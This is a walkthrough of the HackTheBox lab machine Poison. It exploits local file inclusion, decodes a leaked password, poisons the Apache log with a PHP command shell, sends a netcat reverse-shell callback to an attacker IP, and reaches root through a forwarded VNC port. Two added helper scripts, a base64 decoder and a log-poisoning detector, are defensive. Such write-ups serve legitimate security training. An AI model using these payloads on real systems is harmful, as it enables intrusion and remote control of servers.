Poison HackTheBox WalkThrough
This is the Poison HackTheBox machine walkthrough and is also the 20th machine of our OSCP-like HTB boxes series. In this writeup, I have demonstrated step by step how I rooted the Poison HTB machine in two different ways. Before starting, let us know something about this machine. It is a FreeBSD box with IP address 10.10.10.84 and difficulty medium, assigned by its maker. This machine is currently retired, so you will require a VIP subscription at hackthebox.eu to access it. First of all, connect your PC to the HackTheBox VPN and check your connectivity with the Poison machine by pinging IP 10.10.10.84. If all goes correctly then start hacking. As usual I started by scanning the machine. I used Nmap [a port scanner] for this task and the result is below:
$ sudo nmap -sC -sV -oA nmap/Poison 10.10.10.84
$ cat nmap/Poison.nmap
Nmap found ports 22 and 80 open: OpenSSH on port 22 and an Apache 2 web server on port 80. Enumeration on port 22 is not useful here because OpenSSH 7.2 has not many vulnerabilities that could give us information to help further enumeration, so I began my enumeration from port 80. Also, port 80 has a larger attack surface to enumerate than port 22. Going to the URL http://10.10.10.84/ I found a website made entirely of HTML and PHP.
There are many PHP scripts listed. After entering the listfiles.php script into the Scriptname field and submitting, I found an array that contains a number of files. This array also contains a file pwdbackup.txt. When I accessed this file using the URL view-source:http://10.10.10.84/browse.php?file=pwdbackup.txt, it contained base64-encoded characters along with a message that it is encoded at least 13 times. When I decoded it I got a password. To decode it, first copy the whole encoded password into a file and then decode it 13 times.
$ nano encoded-passwd
$ base64 -d encoded-passwd | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d | base64 -d
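As an added example (not part of the original walkthrough), the following Python script generalises the 13-step decode chain: it keeps stripping base64 layers until the output no longer looks like base64, so the layer count does not have to be known in advance. The sample input is constructed by wrapping the recovered password 13 times, the way pwdbackup.txt was.

```python
import base64
import binascii
import re

# Anything outside the base64 alphabet (plus whitespace and trailing '=') means
# we have reached plaintext; the recovered password contains '!' and '#', so the
# loop stops there. Caveat: a plaintext that happens to be valid base64 would be
# decoded one level too far, so check the final output by eye.
B64_RE = re.compile(rb"^[A-Za-z0-9+/]*={0,2}$")


def peel_base64(data: bytes, max_layers: int = 64):
    """Strip base64 layers until the data is no longer valid base64.

    Returns (final_bytes, layers_removed).
    """
    layers = 0
    while layers < max_layers:
        stripped = b"".join(data.split())  # tolerate the line wrapping of base64 output
        if not stripped or len(stripped) % 4 != 0 or not B64_RE.match(stripped):
            break
        try:
            decoded = base64.b64decode(stripped, validate=True)
        except binascii.Error:
            break
        data, layers = decoded, layers + 1
    return data, layers


def wrap_base64(plaintext: bytes, layers: int) -> bytes:
    """Constructed test input: wrap plaintext in the given number of base64 layers."""
    data = plaintext
    for _ in range(layers):
        data = base64.b64encode(data)
    return data


if __name__ == "__main__":
    sample = wrap_base64(b"Charix!2#4%6&8(0", 13)  # constructed, mirrors pwdbackup.txt
    password, depth = peel_base64(sample)
    print(f"{depth} layers removed -> {password.decode()}")
```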
After decoding I got the password Charix!2#4%6&8(0. I didn't know whose password it was; we would try it to log in over SSH once we got a username. After some enumeration I found an LFI vulnerability at URL http://10.10.10.84/browse.php?file=/etc/passwd. For a clearer view check its source code, as shown in the screenshot. The passwd file revealed two users that have a shell, one of them charix. When I tried to SSH into the charix account using the decoded password I could log in easily. So here our credential is charix:Charix!2#4%6&8(0. Let us SSH into charix's account.
Getting User Shell via SSH ~ Method 1
$ ssh charix@10.10.10.84
% whoami && id
We have successfully got a user shell. Let us capture the user flag.
Capture User Flag
% cat user.txt
Getting User Shell via Log Poisoning ~ Method 2
We have successfully got the user flag. I am also going to get a shell another way, which is probably the intended way: Log Poisoning, and I think this is the reason the name of the box is Poison. Before going further we should know what log poisoning is. When an attacker finds an LFI vulnerability he tries to upgrade it to RCE so that the attack can be more successful. He uses several techniques to get RCE and log poisoning is one of them. In log poisoning an attacker attempts to inject malicious input into the server log and then accesses the log file via the LFI vulnerability. The log file records the User-Agent of each request, and the User-Agent header can be controlled by the attacker, so he replaces the User-Agent with his own PHP code as shown in the request below (this request is to http://10.10.10.84). After sending the request, when he checks the log file he will find the output of that code in it. For more info on LFI to RCE check this link.
We can access the log file of the Poison web server at URL view-source:http://10.10.10.84/browse.php?file=/var/log/httpd-access.log. As you can see our PHP code is executed and hello is printed in the log.
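From the defender's side, the access-log entries this technique leaves behind are easy to pick out. The following Python script, added here and not from the original post, parses Apache combined-format lines and flags PHP tags in the User-Agent or Referer, file= parameters pointing at logs or system files, and a cmd= parameter; the sample log lines are constructed.

```python
import re

# Apache "combined" log line:
#   client ident authuser [time] "request" status bytes "referer" "user-agent"
COMBINED_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# Heuristic indicators of the technique described above. PHP open tags have no
# business in a User-Agent or Referer header; "file=" pointing at the log itself
# or at system files is the include half of the attack; "cmd=" is the parameter
# the injected code reads. (A bare "<?" also matches "<?xml", so treat hits as
# items for review rather than for automatic blocking.)
PHP_TAG_RE = re.compile(r"<\?(php|=)?", re.IGNORECASE)
SENSITIVE_INCLUDE_RE = re.compile(r"[?&]file=(/var/log/|/etc/|\.\./)", re.IGNORECASE)
CMD_PARAM_RE = re.compile(r"[?&]cmd=", re.IGNORECASE)


def classify(line):
    """Return the list of findings for one access-log line (empty when benign)."""
    m = COMBINED_RE.match(line.rstrip("\n"))
    if not m:
        return ["unparsable"]
    findings = []
    if PHP_TAG_RE.search(m["agent"]) or PHP_TAG_RE.search(m["referer"]):
        findings.append("php-tag-in-header")
    if SENSITIVE_INCLUDE_RE.search(m["request"]):
        findings.append("sensitive-file-include")
    if CMD_PARAM_RE.search(m["request"]):
        findings.append("command-parameter")
    return findings


def scan(lines):
    """Return (line, findings) for every line that raised at least one finding."""
    return [(line, f) for line in lines if (f := classify(line))]


# Constructed sample lines (not copied from the box) in Apache combined format.
SAMPLE_LOG = [
    '10.10.14.16 - - [18/Mar/2018:10:00:01 +0100] "GET /index.php HTTP/1.1" 200 289 "-" "Mozilla/5.0"',
    '10.10.14.16 - - [18/Mar/2018:10:00:02 +0100] "GET /browse.php?file=/etc/passwd HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
    '10.10.14.16 - - [18/Mar/2018:10:00:03 +0100] "GET / HTTP/1.1" 200 289 "-" "<?php echo 1; ?>"',
    '10.10.14.16 - - [18/Mar/2018:10:00:04 +0100] "GET /browse.php?file=/var/log/httpd-access.log&cmd=id HTTP/1.1" 200 4096 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for line, findings in scan(SAMPLE_LOG):
        print(", ".join(findings), "<-", line)
```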
Now let us include a cmd variable in our PHP code through which we can execute OS commands to get a reverse shell. Replace the User-Agent with the following PHP code and forward the request from Repeater:
<?php system($_GET['cmd']) ?>
We can access the URL view-source:http://10.10.10.84/browse.php?file=/var/log/httpd-access.log&cmd=id in the browser to execute an OS command. Simply replace id with the required OS command and you will get its result at the bottom of the page. We can confirm this by the result of the id command at the bottom.
We have successfully confirmed RCE via log poisoning. To get a reverse shell, start a netcat listener on your Kali machine in one window and request the following URL either in a web browser or through curl as shown below.
Getting Reverse Shell
$ nc -nvlp 1234
$ whoami && id
$ curl http://10.10.10.84/browse.php?file=/var/log/httpd-access.log&cmd=rm%20/tmp/f;mkfifo%20/tmp/f;cat%20/tmp/f|/bin/sh%20-i%202%3E%261|nc%2010.10.14.16%201234%20%3E/tmp/f
We have successfully got a user shell. So this was the intended way to get into the box. Now exit this shell and log in over SSH using the creds charix:Charix!2#4%6&8(0 to start privilege escalation. To escalate privileges to root we first have to find a privilege escalation vector.
Finding PrivEsc Vector
During some initial enumeration I found a secret.zip file inside charix's home directory. I then copied this file to my Kali machine so that I could unzip it and analyze its contents. When I tried to extract it, it asked for a password; I entered Charix!2#4%6&8(0 and it extracted successfully. After extraction I got a file named secret. It is an extended-ASCII file. On checking its content with cat it shows some unreadable characters. I didn't know exactly what this file was for. We will check this file later and see where we need it.
Copying File locally to Kali Machine
% cat secret.zip | nc 10.10.14.16 1234 #On Poison Machine
$ nc -l -p 1234 > secret.zip < /dev/null #On Kali Machine
$ unzip secret.zip
Checking listening ports on the Poison machine, I found ports 5801 and 5901 listening locally. After some googling I found that 5801 and 5901 are VNC ports, used for remote desktop access.
% netstat -an | grep "LISTEN"
Using the ps command I found an Xvnc process running. Xvnc is a VNC server, and this VNC server is running with root privileges. So our potential PrivEsc vector is VNC.
% ps -aux | grep vnc
Since VNC connects to a GUI desktop, it is not possible to get a VNC session through the terminal. We have to locally forward port 5901 to our Kali machine to use the VNC session.
Local Port Forwarding
$ ssh -L 5901:127.0.0.1:5901 charix@10.10.10.84 # To perform Local Port Forwarding
$ ss -lnpt # Check listening port on your Kali machine
When I connected with vncviewer at port 5901 using the secret file as the password file, it opened a VNC desktop, as you can see in the screenshot, and that too with root user access. So we have successfully escalated privileges to root. Let us capture the root flag.
$ vncviewer -passwd secret 127.0.0.1:5901
Capture root Flag
# cat root.txt
This was how I rooted the Poison HackTheBox machine. I hope you have learnt something new from this machine walkthrough. Thanks for reading this article. For any query or suggestion related to the walkthrough feel free to write to us at [email protected].